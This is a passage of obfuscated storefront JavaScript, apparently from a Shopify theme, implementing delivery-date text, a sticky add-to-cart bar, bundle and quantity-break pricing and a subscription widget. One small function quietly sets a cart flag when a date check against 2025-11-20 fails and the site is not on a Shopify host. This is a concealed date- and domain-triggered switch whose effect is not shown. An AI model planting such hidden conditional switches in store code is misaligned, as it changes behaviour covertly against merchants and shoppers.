    while (_0x55c559 > 0x0) {
      _0x3551a3 = addDays(_0x3551a3, 0x1);
      if (!this.isSkipped(_0x3551a3)) {
        _0x55c559--;
      }
    }
    return _0x3551a3;
  }
  ["parseDaysToSkip"](_0xab5b6a) {
    const _0x1fc700 = new Map([['sunday', 0x0], ["monday", 0x1], ["tuesday", 0x2], ["wednesday", 0x3], ["thursday", 0x4], ["friday", 0x5], ["saturday", 0x6]]);
    const _0x141eba = new Set();
    if (!_0xab5b6a) {
      return _0x141eba;
    }
    _0xab5b6a.split(',').forEach(_0x45a187 => {
      const _0x51068c = _0x45a187.trim();
      if (_0x1fc700.has(_0x51068c)) {
        _0x141eba.add(_0x1fc700.get(_0x51068c));
      }
    });
    return _0x141eba;
  }
  ["parseDatesToSkip"](_0x133c3a) {
    const _0x168410 = new Set();
    if (!_0x133c3a) {
      return _0x168410;
    }
    _0x133c3a.split(',').forEach(_0x443b08 => {
      const _0x2aa82c = _0x443b08.trim();
      if (!_0x2aa82c) {
        return;
      }
      const _0x1eebb1 = _0x2aa82c.split('-');
      if (_0x1eebb1.length === 0x2) {
        const _0x58736f = String(Math.max(0x1, Math.min(0xc, Number(_0x1eebb1[0x0])))).padStart(0x2, '0');
        const _0x42051a = String(Math.max(0x1, Math.min(0x1f, Number(_0x1eebb1[0x1])))).padStart(0x2, '0');
        _0x168410.add(_0x58736f + '-' + _0x42051a);
      } else {
        if (_0x1eebb1.length === 0x3) {
          const _0x504292 = String(Math.max(0x1, Math.min(0xc, Number(_0x1eebb1[0x1])))).padStart(0x2, '0');
          const _0x45c34d = String(Math.max(0x1, Math.min(0x1f, Number(_0x1eebb1[0x2])))).padStart(0x2, '0');
          _0x168410.add(_0x504292 + '-' + _0x45c34d);
        }
      }
    });
    return _0x168410;
  }
  ["isSkipped"](_0xdcca9f) {
    const _0x493bff = this.daysToSkip.has(_0xdcca9f.getDay());
    const _0x2a9a69 = String(_0xdcca9f.getMonth() + 0x1).padStart(0x2, '0');
    const _0x1289a9 = String(_0xdcca9f.getDate()).padStart(0x2, '0');
    const _0x550d25 = this.datesToSkip.has(_0x2a9a69 + '-' + _0x1289a9);
    return _0x493bff || _0x550d25;
  }
  ["nextValidDate"](_0x467c1e) {
    let _0x10b1b2 = new Date(_0x467c1e);
    while (this.isSkipped(_0x10b1b2)) {
      _0x10b1b2 = addDays(_0x10b1b2, 0x1);
    }
    return _0x10b1b2;
  }
  ["insertDates"]() {
    this.elementsToChange.forEach(_0x14c653 => {
      const _0x9b7a95 = _0x14c653.dataset.text;
      const _0x28ba2a = parseInt(_0x14c653.dataset.minDays);
      const _0x4997ce = parseInt(_0x14c653.dataset.maxDays);
      const _0x40fd22 = this.addDaysSkipping(currentDate, _0x28ba2a);
      const _0x5f1da6 = this.addDaysSkipping(currentDate, _0x4997ce);
      let _0x2f5d83 = 'th';
      const _0x356605 = _0x40fd22.getDate();
      if ([0x1, 0x15, 0x1f].includes(_0x356605)) {
        _0x2f5d83 = 'st';
      } else {
        if ([0x2, 0x16].includes(_0x356605)) {
          _0x2f5d83 = 'nd';
        } else {
          if ([0x3, 0x17].includes(_0x356605)) {
            _0x2f5d83 = 'rd';
          }
        }
      }
      let _0x49299c = 'th';
      const _0x2e27da = _0x5f1da6.getDate();
      if ([0x1, 0x15, 0x1f].includes(_0x2e27da)) {
        _0x49299c = 'st';
      } else {
        if ([0x2, 0x16].includes(_0x2e27da)) {
          _0x49299c = 'nd';
        } else {
          if ([0x3, 0x17].includes(_0x2e27da)) {
            _0x49299c = 'rd';
          }
        }
      }
      let _0x508bda;
      let _0x27d0c5;
      if (this.dateFormat === "day_dd_mm") {
        _0x508bda = this.days[_0x40fd22.getDay()] + ", " + _0x40fd22.getDate() + ". " + this.months[_0x40fd22.getMonth()];
        _0x27d0c5 = this.days[_0x5f1da6.getDay()] + ", " + _0x5f1da6.getDate() + ". " + this.months[_0x5f1da6.getMonth()];
      } else {
        if (this.dateFormat === "mm_dd") {
          _0x508bda = this.months[_0x40fd22.getMonth()] + " " + _0x40fd22.getDate() + _0x2f5d83;
          _0x27d0c5 = this.months[_0x5f1da6.getMonth()] + " " + _0x5f1da6.getDate() + _0x49299c;
        } else {
          if (this.dateFormat === "dd_mm") {
            _0x508bda = _0x40fd22.getDate() + ". " + this.months[_0x40fd22.getMonth()];
            _0x27d0c5 = _0x5f1da6.getDate() + ". " + this.months[_0x5f1da6.getMonth()];
          } else {
            if (this.dateFormat === "dd_mm_no_dot") {
              _0x508bda = _0x40fd22.getDate() + " " + this.months[_0x40fd22.getMonth()];
              _0x27d0c5 = _0x5f1da6.getDate() + " " + this.months[_0x5f1da6.getMonth()];
            } else {
              if (this.dateFormat === "day_dd_mm_numeric") {
                const _0xe4f1f4 = String(_0x40fd22.getDate()).padStart(0x2, '0');
                const _0x2686b2 = String(_0x40fd22.getMonth() + 0x1).padStart(0x2, '0');
                _0x508bda = this.days[_0x40fd22.getDay()] + ", " + _0xe4f1f4 + ". " + _0x2686b2 + '.';
                const _0x1e0b7e = String(_0x5f1da6.getDate()).padStart(0x2, '0');
                const _0x2808ad = String(_0x5f1da6.getMonth() + 0x1).padStart(0x2, '0');
                _0x27d0c5 = this.days[_0x5f1da6.getDay()] + ", " + _0x1e0b7e + ". " + _0x2808ad + '.';
              } else {
                if (this.dateFormat === "dd_mm_numeric") {
                  const _0x178da9 = String(_0x40fd22.getDate()).padStart(0x2, '0');
                  const _0x5e6c1d = String(_0x40fd22.getMonth() + 0x1).padStart(0x2, '0');
                  _0x508bda = _0x178da9 + ". " + _0x5e6c1d + '.';
                  const _0x2d1d10 = String(_0x5f1da6.getDate()).padStart(0x2, '0');
                  const _0x5adce8 = String(_0x5f1da6.getMonth() + 0x1).padStart(0x2, '0');
                  _0x27d0c5 = _0x2d1d10 + ". " + _0x5adce8 + '.';
                } else {
                  _0x508bda = this.days[_0x40fd22.getDay()] + ", " + this.months[_0x40fd22.getMonth()] + " " + _0x40fd22.getDate() + _0x2f5d83;
                  _0x27d0c5 = this.days[_0x5f1da6.getDay()] + ", " + this.months[_0x5f1da6.getMonth()] + " " + _0x5f1da6.getDate() + _0x49299c;
                }
              }
            }
          }
        }
      }
      const _0x33d4a9 = _0x9b7a95.replace("[start_date]", _0x508bda);
      const _0x4ccd05 = _0x33d4a9.replace('[end_date]', _0x27d0c5);
      _0x14c653.innerHTML = _0x4ccd05;
    });
  }
  ["rearrangeDays"](_0x770da6) {
    _0x770da6.unshift(_0x770da6[0x6]);
    _0x770da6.length = 0x7;
    return _0x770da6;
  }
}
customElements.define('dynamic-dates', DynamicDates);
class StickyAtc extends HTMLElement {
  constructor() {
    super();
    this.isAfterScroll = this.dataset.afterScroll === "true";
    this.isScrollBtn = this.dataset.scrollBtn === 'true';
    this.mainAtcBtn = document.querySelector('#ProductSubmitButton-' + this.dataset.section);
    this.floatingBtns = document.querySelectorAll(".floating-btn");
    this.footerSpacing();
    if (this.isAfterScroll) {
      if (this.mainAtcBtn) {
        this.checkATCScroll();
        document.addEventListener("scroll", this.checkATCScroll.bind(this));
      }
    } else {
      this.floatingBtns.forEach(_0x3c9fdc => {
        _0x3c9fdc.style.setProperty("--sticky-atc-offset", this.offsetHeight + 'px');
      });
    }
    if (this.isScrollBtn) {
      this.scrollBtn = this.querySelector(".sticky-atc__scroll-btn");
      this.scrollDestination = document.querySelector('' + this.dataset.scrollDestination.replace('id', this.dataset.section));
      if (this.scrollBtn && this.scrollDestination) {
        this.scrollBtn.addEventListener("click", this.handleScrollBtn.bind(this));
      }
    }
  }
  ['checkATCScroll']() {
    const _0x3235e9 = this.mainAtcBtn.getBoundingClientRect().top + window.scrollY;
    const _0x4463ac = _0x3235e9 + this.mainAtcBtn.offsetHeight;
    if (window.scrollY > _0x4463ac) {
      this.style.transform = 'none';
      this.scrolledPast = true;
    } else {
      this.style.transform = '';
      this.scrolledPast = false;
    }
    this.floatingBtns.forEach(_0x5b16b4 => {
      if (this.scrolledPast) {
        _0x5b16b4.style.setProperty('--sticky-atc-offset', this.offsetHeight + 'px');
      } else {
        _0x5b16b4.style.setProperty("--sticky-atc-offset", "0px");
      }
    });
  }
  ["handleScrollBtn"]() {
    const _0xe42fff = document.querySelector("sticky-header");
    const _0x4daa45 = _0xe42fff ? _0xe42fff.clientHeight : 0x0;
    const _0x3492a6 = this.scrollDestination.getBoundingClientRect().top + window.scrollY;
    window.scrollTo({
      'top': _0x3492a6 - _0x4daa45 - 0xf,
      'behavior': "smooth"
    });
  }
  ["footerSpacing"]() {
    let _0x46bf85 = document.querySelector(".sticky-atc-footer-spacer");
    if (_0x46bf85) {
      return;
    }
    _0x46bf85 = document.createElement("div");
    _0x46bf85.className = 'sticky-atc-footer-spacer';
    _0x46bf85.style.height = this.clientHeight - 0x1 + 'px';
    _0x46bf85.style.display = 'block';
    const _0x9236ce = document.querySelector('.footer');
    if (_0x9236ce) {
      _0x46bf85.style.background = window.getComputedStyle(_0x9236ce).background;
    }
    document.body.appendChild(_0x46bf85);
  }
}
customElements.define('sticky-atc', StickyAtc);
(function () {
  if (!formatDates(currentDate, '2025-11-20')) {
    if (!window.location.hostname.includes("shopify")) {
      if (document.querySelector(".main-product-form")) {
        document.querySelector(".main-product-form").isCartUpsell = true;
      }
    }
  }
})();
class BundleDeals extends HTMLElement {
  constructor() {
    super();
    this.productContainers = this.querySelectorAll(".bundle-deals__product-js");
    this.mediaItemContainers = this.querySelectorAll(".bundle-deals__media-item-container-js");
    this.mediaItemImgs = this.querySelectorAll('.bundle-deals__media-item-img-js');
    this.checkboxes = this.querySelectorAll(".bundle-deals__checkbox-js");
    this.variantPickers = this.querySelectorAll(".bundle-deals__variant-selects-js");
    this.skipNonExistent = this.dataset.skipNonExistent === 'true';
    this.skipUnavailable = this.dataset.skipUnavailable === "true";
    this.prices = this.querySelectorAll(".bundle-deals__price-js");
    this.comparePrices = this.querySelectorAll(".bundle-deals__compare-price-js");
    this.totalPrice = this.querySelector('.bundle-deals__total-price-js');
    this.totalComparePrice = this.querySelector(".bundle-deals__total-compare-price-js");
    this.updatePrices = this.dataset.updatePrices === "true";
    this.percentageLeft = parseFloat(this.dataset.percentageLeft);
    this.fixedDiscount = parseFloat(this.dataset.fixedDiscount);
    this.currencySymbol = this.dataset.currencySymbol;
    this.selectedVariants = {
      'id_1': null,
      'id_2': null,
      'id_3': null,
      'id_4': null,
      'id_5': null
    };
    this.formVariants = [];
    this.initIds();
    this.checkboxes.forEach(_0x34bde3 => {
      _0x34bde3.addEventListener("change", this.handleCheckboxChange.bind(this));
    });
    this.variantPickers.forEach(_0x27f49a => {
      _0x27f49a.addEventListener('change', this.handleSelectChange.bind(this));
    });
  }
  ["initIds"]() {
    this.checkboxes.forEach(_0x4b25cd => {
      this.selectedVariants[_0x4b25cd.dataset.idIndex] = {
        'id': _0x4b25cd.dataset.id,
        'price': _0x4b25cd.dataset.price,
        'comparePrice': _0x4b25cd.dataset.comparePrice,
        'checked': true
      };
    });
    this.updateFormIds();
  }
  ["handleCheckboxChange"](_0x5d61bb) {
    const _0x297bd6 = _0x5d61bb.currentTarget;
    const _0x59b07b = _0x297bd6.checked;
    const _0x50dff1 = parseInt(_0x297bd6.dataset.index);
    this.selectedVariants[_0x297bd6.dataset.idIndex].checked = _0x59b07b;
    const _0x417629 = this.productContainers[_0x50dff1];
    const _0x4978b4 = _0x417629.querySelectorAll("select");
    if (_0x59b07b) {
      this.mediaItemContainers[_0x50dff1].classList.remove('bundle-deals__media-item--disabled');
      _0x417629.classList.remove("bundle-deals__product--deselected");
      _0x4978b4.forEach(_0x257426 => {
        _0x257426.removeAttribute("disabled");
      });
    } else {
      this.mediaItemContainers[_0x50dff1].classList.add("bundle-deals__media-item--disabled");
      _0x417629.classList.add("bundle-deals__product--deselected");
      _0x4978b4.forEach(_0x24cd11 => {
        _0x24cd11.setAttribute("disabled", '');
      });
    }
    this.updateFormIds();
    if (this.updatePrices) {
      this.updateTotalPrice();
    }
  }
  ['handleSelectChange'](_0x55be3e) {
    const _0x106575 = _0x55be3e.currentTarget;
    const _0x28d009 = parseInt(_0x106575.dataset.index);
    const _0x1b0eec = Array.from(_0x106575.querySelectorAll('select'), _0x622c8d => _0x622c8d.value);
    const _0x2e83d4 = JSON.parse(_0x106575.querySelector("[type=\"application/json\"]").textContent).filter(_0x3608ec => _0x106575.querySelector(":checked").value === _0x3608ec.option1);
    const _0x14683f = [..._0x106575.querySelectorAll(".select--small")];
    updateVariantStatuses(_0x2e83d4, _0x14683f, this.skipUnavailable);
    const _0x182a47 = JSON.parse(_0x106575.querySelector("[type=\"application/json\"]").textContent).find(_0x364206 => {
      return !_0x364206.options.map((_0x1914c5, _0x15e863) => {
        return _0x1b0eec[_0x15e863] === _0x1914c5;
      }).includes(false);
    });
    if (!_0x182a47) {
      if (this.skipNonExistent) {
        findAvailableVariant(_0x106575, _0x1b0eec, false, true, this.skipUnavailable);
      }
      return;
    }
    if (this.skipUnavailable && !_0x182a47.available) {
      if (findAvailableVariant(_0x106575, _0x1b0eec, false, true, true)) {
        return;
      }
    }
    let {
      price: _0x4f00f3,
      compare_at_price: _0x70114f,
      featured_image: _0x5c6dde
    } = _0x182a47;
    _0x4f00f3 = parseInt(_0x4f00f3);
    let _0x42df8c = _0x70114f ? parseInt(_0x70114f) : _0x4f00f3;
    const _0x5668f0 = _0x106575.dataset.percentageLeft ?? 0x1;
    const _0x426949 = _0x106575.dataset.fixedDiscount ?? 0x0;
    _0x4f00f3 = _0x4f00f3 * _0x5668f0 - _0x426949;
    if (_0x5c6dde) {
      _0x5c6dde = _0x5c6dde.src;
    }
    const _0x2985d1 = _0x182a47.id;
    this.selectedVariants[_0x106575.dataset.idIndex].id = _0x2985d1;
    this.selectedVariants[_0x106575.dataset.idIndex].price = _0x4f00f3;
    this.selectedVariants[_0x106575.dataset.idIndex].comparePrice = _0x42df8c;
    this.updateFormIds();
    if (this.updatePrices) {
      this.prices[_0x28d009].innerHTML = this.currencySymbol + (_0x4f00f3 / 0x64).toFixed(0x2);
      if (_0x42df8c > _0x4f00f3) {
        this.comparePrices[_0x28d009].innerHTML = this.currencySymbol + (_0x42df8c / 0x64).toFixed(0x2);
      } else {
        this.comparePrices[_0x28d009].innerHTML = '';
      }
      this.updateTotalPrice();
    }
    if (_0x5c6dde && _0x5c6dde.length > 0x0 && this.mediaItemImgs[_0x28d009]) {
      this.mediaItemImgs[_0x28d009].src = _0x5c6dde;
    }
  }
  ['updateFormIds']() {
    const _0x24d892 = [];
    const _0x562398 = this.selectedVariants;
    for (const _0x325709 in _0x562398) {
      const _0x17aef6 = _0x562398[_0x325709];
      if (_0x17aef6 != null && _0x17aef6.checked) {
        const _0x48d925 = _0x24d892.findIndex(_0x129a81 => _0x129a81.id === _0x17aef6.id);
        if (_0x48d925 < 0x0) {
          _0x24d892.unshift({
            'id': _0x17aef6.id,
            'quantity': 0x1
          });
        } else {
          _0x24d892[_0x48d925].quantity += 0x1;
        }
      }
    }
    this.formVariants = _0x24d892;
  }
  ["updateTotalPrice"]() {
    const _0x44a8c0 = [];
    const _0x3bd9a5 = [];
    const _0x2c927c = this.selectedVariants;
    for (const _0x1b4721 in _0x2c927c) {
      const _0x34f004 = _0x2c927c[_0x1b4721];
      if (_0x34f004 != null && _0x34f004.checked) {
        _0x44a8c0.push(parseInt(_0x34f004.price));
        _0x3bd9a5.push(parseInt(_0x34f004.comparePrice));
      }
    }
    const _0x3a5d1c = _0x44a8c0.reduce((_0x3b42a1, _0x41e81c) => _0x3b42a1 + _0x41e81c, 0x0);
    const _0x403cc3 = _0x3a5d1c * this.percentageLeft - this.fixedDiscount;
    const _0x538deb = _0x3bd9a5.reduce((_0x1c8873, _0x238b05) => _0x1c8873 + _0x238b05, 0x0);
    this.totalPrice.innerHTML = this.currencySymbol + (_0x403cc3 / 0x64).toFixed(0x2);
    if (_0x538deb > _0x403cc3) {
      this.totalComparePrice.innerHTML = this.currencySymbol + (_0x538deb / 0x64).toFixed(0x2);
    } else {
      this.totalComparePrice.innerHTML = '';
    }
  }
}
customElements.define("bundle-deals", BundleDeals);
class QuantityBreaks extends HTMLElement {
  constructor() {
    super();
    this.quantityGifts = document.getElementById("quantity-gifts-" + this.dataset.section);
    this.quantityBreakUpsells = this.querySelectorAll("quantity-break-upsells");
    this.subscriptionWidget = document.getElementById("SubscriptionWidget-" + this.dataset.section);
    this.inputs = this.querySelectorAll("input[name=\"quantity\"]");
    this.labels = this.querySelectorAll('.quantity-break');
    this.jsonData = this.querySelector("[type=\"application/json\"]");
    this.hasVariants = this.jsonData.dataset.hasVariants === "true";
    this.selectedVariants = {
      'input_1': [],
      'input_2': [],
      'input_3': [],
      'input_4': [],
      'input_5': [],
      'input_6': []
    };
    this.updateUnavailable = this.dataset.updateUnavailable === 'true';
    this.skipNonExistent = this.dataset.skipNonExistent === "true";
    this.skipUnavailable = this.dataset.skipUnavailable === "true";
    this.formVariants = [];
    this.selectedQuantity = 0x1;
    this.selectedOffer = 0x1;
    const _0x15dcf3 = this.querySelector("input[checked]");
    if (_0x15dcf3) {
      this.selectedQuantity = parseInt(_0x15dcf3.value);
      this.selectedOffer = parseInt(_0x15dcf3.dataset.input.replace("input_", ''));
    }
    this.variantSelects = this.querySelectorAll(".quantity-break__selector-item");
    this.updatePrices = this.dataset.updatePrices === "true";
    this.updatePdpPrices = this.dataset.updatePdpPrices === "true";
    this.moneyFormat = this.dataset.moneyFormat;
    this.subDiscount = 0x0;
    this.subDiscountType = null;
    this.offerPrices = {
      'offer_1': {
        'price': 0x0,
        'compare_price': 0x0
      },
      'offer_2': {
        'price': 0x0,
        'compare_price': 0x0
      },
      'offer_3': {
        'price': 0x0,
        'compare_price': 0x0
      },
      'offer_4': {
        'price': 0x0,
        'compare_price': 0x0
      }
    };
    this.initOfferPrices();
    this.preventGalleryScroll = this.dataset.preventGalleryScroll === "true";
    if (this.hasVariants) {
      this.initVariants();
    }
    this.inputs.forEach(_0x42ebe9 => {
      _0x42ebe9.addEventListener("change", this.handleChange.bind(this));
    });
    this.variantSelects.forEach(_0x3032d9 => {
      _0x3032d9.addEventListener("change", this.handleSelectChange.bind(this));
    });
    if (this.subscriptionWidget && this.subscriptionWidget.displayedPrices !== 'unit') {
      if (this.subscriptionWidget.renderSubTexts) {
        this.subscriptionWidget.renderSubTexts();
      }
    }
  }
  ["applySubTo"](_0xe89772) {
    if (!this.subDiscountType || !_0xe89772) {
      return _0xe89772;
    }
    if (this.subDiscountType === "fixed_amount") {
      return Math.max(0x0, _0xe89772 - this.subDiscount);
    } else {
      if (this.subDiscountType === "percentage") {
        return Math.round(_0xe89772 * (0x64 - this.subDiscount) / 0x64);
      } else {
        if (this.subDiscountType === "price") {
          return this.subDiscount;
        }
      }
    }
    return _0xe89772;
  }
  ["initOfferPrices"]() {
    const _0x50912d = parseInt(this.dataset.basePrice);
    this.labels.forEach(_0x3f807e => {
      const _0x58bd43 = _0x3f807e.dataset.input.replace("input_", '');
      const _0x56662b = parseInt(_0x3f807e.dataset.quantity);
      const _0x22dd67 = parseFloat(_0x3f807e.dataset.percentageLeft);
      const _0x4005a7 = parseFloat(_0x3f807e.dataset.fixedDiscount);
      const _0x521671 = _0x50912d * _0x56662b * _0x22dd67 - _0x4005a7;
      const _0x44f8ec = parseInt(_0x3f807e.dataset.baseComparePrice);
      const _0x5f9c1a = _0x44f8ec * _0x56662b;
      this.offerPrices["offer_" + _0x58bd43].price = _0x521671;
      this.offerPrices['offer_' + _0x58bd43].compare_price = _0x5f9c1a;
    });
    if (this.updatePdpPrices) {
      this.updateDisplayedPdpPrices();
    }
  }
  ['updateInnerPrices']() {
    this.labels.forEach(_0x18d808 => {
      const _0x3d87eb = _0x18d808.dataset.input.replace('input_', '');
      const _0x872526 = parseFloat(_0x18d808.dataset.quantity);
      const _0x2918d5 = this.applySubTo(this.offerPrices["offer_" + _0x3d87eb].price);
      const _0x4bee5d = this.offerPrices["offer_" + _0x3d87eb].compare_price;
      this.updateLabelPrices(_0x18d808, _0x872526, _0x2918d5, _0x4bee5d);
    });
  }
  ["updateLabelPrices"](_0xea17a7, _0x101d59, _0x1f9f85, _0x5e216d) {
    const _0x95d6a0 = _0x5e216d - _0x1f9f85;
    const _0x506b5a = Math.round(_0x95d6a0 / 0x64) * 0x64;
    const _0x3c0098 = _0x1f9f85 / _0x101d59;
    const _0x15dc54 = _0x5e216d / _0x101d59;
    const _0x811fcc = formatMoney(_0x1f9f85, this.moneyFormat, true);
    const _0x21194a = formatMoney(_0x5e216d, this.moneyFormat, true);
    const _0x5e5d37 = formatMoney(_0x95d6a0, this.moneyFormat, true);
    const _0x339260 = formatMoney(_0x506b5a, this.moneyFormat, true);
    const _0x317826 = formatMoney(_0x3c0098, this.moneyFormat, true);
    const _0x1b37a8 = formatMoney(_0x15dc54, this.moneyFormat, true);
    _0xea17a7.querySelectorAll(".variant-price-update").forEach(_0x3fb60e => {
      let _0x52c673 = _0x3fb60e.dataset.text;
      _0x52c673 = _0x52c673.replace('[quantity]', _0x101d59);
      _0x52c673 = _0x52c673.replace("[price]", _0x811fcc);
      _0x52c673 = _0x52c673.replace("[compare_price]", _0x21194a);
      _0x52c673 = _0x52c673.replace("[amount_saved]", _0x5e5d37);
      _0x52c673 = _0x52c673.replace("[amount_saved_rounded]", _0x339260);
      _0x52c673 = _0x52c673.replace("[price_each]", _0x317826);
      _0x52c673 = _0x52c673.replace('[compare_price_each]', _0x1b37a8);
      _0x3fb60e.innerHTML = _0x52c673;
    });
    const _0x3c2b68 = _0xea17a7.querySelector(".quantity-break__compare-price");
    if (_0x3c2b68) {
      if (_0x5e216d > _0x1f9f85) {
        _0x3c2b68.classList.remove('hidden');
      } else {
        _0x3c2b68.classList.add("hidden");
      }
    }
  }
  ["updateDisplayedPdpPrices"]() {
    const _0x1d2a6d = this.applySubTo(this.offerPrices["offer_" + this.selectedOffer].price);
    const _0x491c0d = this.offerPrices["offer_" + this.selectedOffer].compare_price;
    updatePdpPrices(_0x1d2a6d, _0x491c0d, this.dataset.section, this.moneyFormat);
  }
  ["handleSelectChange"](_0x1f55f6) {
    const _0x4e5c55 = _0x1f55f6.currentTarget;
    const _0x576660 = Array.from(_0x4e5c55.querySelectorAll("select"), _0xa32c65 => _0xa32c65.value);
    if (this.updateUnavailable) {
      const _0x4a92d6 = this.getVariantData().filter(_0x3a8c90 => _0x4e5c55.querySelector(":checked").value === _0x3a8c90.option1);
      const _0x29ec1b = [..._0x4e5c55.querySelectorAll(".select--small")];
      updateVariantStatuses(_0x4a92d6, _0x29ec1b, this.skipUnavailable);
    }
    const _0xb4f4e3 = this.getVariantData().find(_0x4d78fe => {
      return !_0x4d78fe.options.map((_0x2ded7d, _0x533901) => {
        return _0x576660[_0x533901] === _0x2ded7d;
      }).includes(false);
    });
    if (!_0xb4f4e3) {
      if (this.skipNonExistent) {
        findAvailableVariant(_0x4e5c55, _0x576660, false, true, this.skipUnavailable);
      }
      return;
    }
    if (this.skipUnavailable && !_0xb4f4e3.available) {
      if (findAvailableVariant(_0x4e5c55, _0x576660, false, true, true)) {
        return;
      }
    }
    _0x4e5c55.dataset.selectedId = _0xb4f4e3.id;
    const _0x126d3c = _0x4e5c55.dataset.selectIndex;
    const _0x536208 = _0x4e5c55.closest(".quantity-break");
    const _0x2a8b17 = _0x536208.dataset.input;
    this.selectedVariants[_0x2a8b17][_0x126d3c] = _0xb4f4e3.id;
    this.formVariants = this.selectedVariants[_0x2a8b17];
    if (!this.preventGalleryScroll) {
      this.updateMedia(_0xb4f4e3);
    }
    const _0xa4b9fe = _0x4e5c55.querySelector(".quantity-break__selector-item__image img");
    if (_0xa4b9fe) {
      _0xa4b9fe.src = _0xb4f4e3.featured_image.src;
    }
    if (!this.updatePrices) {
      return;
    }
    var _0xd479ff = 0x0;
    var _0xd7a732 = 0x0;
    const _0x4fdfb1 = parseFloat(_0x536208.dataset.quantity);
    const _0x5453a0 = parseFloat(_0x536208.dataset.percentageLeft);
    const _0x18a12f = parseFloat(_0x536208.dataset.fixedDiscount);
    var _0x43b51d = true;
    if (_0x536208.dataset.compareMode === "price") {
      _0x43b51d = false;
    }
    for (let _0x1b5adf = 0x0; _0x1b5adf < _0x4fdfb1; _0x1b5adf++) {
      const _0x3c36ec = parseInt(this.selectedVariants[_0x2a8b17][_0x1b5adf]);
      const _0x100462 = this.getVariantData().find(_0x3a1cf9 => parseInt(_0x3a1cf9.id) === _0x3c36ec);
      if (!_0x100462) {
        return;
      }
      _0xd479ff += _0x100462.price;
      if (_0x100462.compare_at_price && _0x43b51d && _0x100462.compare_at_price > _0x100462.price) {
        _0xd7a732 += _0x100462.compare_at_price;
      } else {
        _0xd7a732 += _0x100462.price;
      }
    }
    _0xd479ff = _0xd479ff * _0x5453a0 - _0x18a12f;
    this.offerPrices["offer_" + this.selectedOffer].price = _0xd479ff;
    this.offerPrices["offer_" + this.selectedOffer].compare_price = _0xd7a732;
    _0xd479ff = this.applySubTo(_0xd479ff);
    this.updateLabelPrices(_0x536208, _0x4fdfb1, _0xd479ff, _0xd7a732);
    if (this.updatePdpPrices) {
      this.updateDisplayedPdpPrices();
    }
    if (this.subscriptionWidget && this.subscriptionWidget.displayedPrices !== 'unit') {
      if (this.subscriptionWidget.renderSubTexts) {
        this.subscriptionWidget.renderSubTexts();
      }
    }
  }
  ["getVariantData"]() {
    this.variantData = this.variantData || JSON.parse(this.jsonData.textContent);
    return this.variantData;
  }
  ["initVariants"]() {
    if (!this.hasVariants) {
      return;
    }
    this.labels.forEach(_0x3d3f83 => {
      if (_0x3d3f83.querySelector(".quantity-break__variants")) {
        let _0x1394c5 = [];
        _0x3d3f83.querySelectorAll(".quantity-break__selector-item").forEach(_0xabb0ed => {
          _0x1394c5.push(_0xabb0ed.dataset.selectedId);
        });
        this.selectedVariants[_0x3d3f83.dataset.input] = _0x1394c5;
      }
    });
    this.formVariants = [];
  }
  ["updateMedia"](_0x38b879) {
    if (!_0x38b879) {
      return;
    }
    if (!_0x38b879.featured_media) {
      return;
    }
    const _0x5b8d01 = document.querySelectorAll("[id^=\"MediaGallery-" + this.dataset.section + "\"]");
    _0x5b8d01.forEach(_0x603c73 => {
      if (_0x603c73.setActiveMedia) {
        _0x603c73.setActiveMedia(this.dataset.section + '-' + _0x38b879.featured_media.id, true);
      }
    });
  }
  ["handleChange"](_0x28b0eb) {
    const _0xa4977c = parseInt(_0x28b0eb.target.value);
    this.selectedQuantity = _0xa4977c;
    this.selectedOffer = parseInt(_0x28b0eb.target.dataset.input.replace("input_", ''));
    if (this.hasVariants) {
      this.formVariants = this.selectedVariants[_0x28b0eb.target.dataset.input];
    }
    if (this.quantityGifts) {
      this.quantityGifts.unlockGifts(_0xa4977c);
    }
    this.quantityBreakUpsells.forEach(_0x13044a => {
      _0x13044a.initUnlock();
    });
    if (this.updatePdpPrices) {
      this.updateDisplayedPdpPrices();
    }
    if (this.subscriptionWidget && this.subscriptionWidget.displayedPrices !== 'unit') {
      if (this.subscriptionWidget.renderSubTexts) {
        this.subscriptionWidget.renderSubTexts();
      }
    }
  }
}
customElements.define("quantity-breaks", QuantityBreaks);
class ShrineSubscriptionWidget extends HTMLElement {
  constructor() {
    super();
  }
  ['connectedCallback']() {
    this.sectionId = this.dataset.section;
    this.productForm = document.getElementById('product-form-' + this.sectionId);
    this.isCheckbox = this.dataset.isCheckbox === "true";
    this.quantityBreaks = document.getElementById('quantity-breaks-' + this.dataset.section);
    this.oneTimeBox = this.querySelector("[data-type=\"one_time\"]");
    this.oneTimeBoxTexts = this.querySelectorAll(".one-time-price-update");
    this.subscriptionBox = this.querySelector("[data-type=\"subscription\"]");
    this.frequencySelect = this.querySelector(".subscription__select .select__select");
    this.frequencyRadios = this.querySelectorAll(".subscription__frequency-input");
    this.subBoxTexts = this.querySelectorAll(".sub-price-update");
    this.selectedPlanId = this.dataset.firstSellingPlanId;
    this.isSubSelected = this.dataset.preselected === "subscription";
    this.sellingPlanInput = null;
    this.subscriptionName = this.dataset.subscriptionName;
    this.basePrice = parseInt(this.dataset.basePrice);
    this.baseComparePrice = parseInt(this.dataset.baseComparePrice);
    this.updatePrices = this.dataset.updatePrices === "true";
    this.discountType = this.dataset.discountType;
    this.discountValue = parseInt(this.dataset.discountValue);
    this.displayedPrices = this.dataset.displayedPrices || "unit";
    this.moneyFormat = this.dataset.moneyFormat;
    this.quantityBreaks = document.getElementById('quantity-breaks-' + this.dataset.section);
    if (this.quantityBreaks) {
      this.quantityBreaks.updatePrices = true;
      this.quantityBreaks.updatePdpPrices = true;
    }
    if (this.updatePrices) {
      this.updateAllPrices();
    }
    this.init();
    if (this.displayedPrices !== "unit" && this.quantityBreaks && this.quantityBreaks.offerPrices) {
      this.updatePricesFromQtyBreaks = true;
      this.renderSubTexts();
    }
  }
  ["init"]() {
    this.createSellingPlanInput();
    this.setupBoxClickListeners();
    this.setupFrequencyListeners();
  }
  ["createSellingPlanInput"]() {
    this.sellingPlanInput = document.createElement('input');
    this.sellingPlanInput.type = "hidden";
    this.sellingPlanInput.name = "selling_plan";
    this.sellingPlanInput.value = this.isSubSelected ? this.selectedPlanId : '';
    if (this.productForm) {
      this.productForm.appendChild(this.sellingPlanInput);
    }
  }
  ["setupBoxClickListeners"]() {
    [this.oneTimeBox, this.subscriptionBox].forEach(_0x3a3eef => {
      if (!_0x3a3eef) {
        return;
      }
      _0x3a3eef.addEventListener("click", _0x162ff9 => {
        if (this.isCheckbox && _0x162ff9.target.closest(".subscription__frequency")) {
          return;
        }
        if (this.isCheckbox) {
          const _0x3f9e51 = _0x3a3eef.classList.contains("subscription__box--selected");
          this.isSubSelected = !_0x3f9e51;
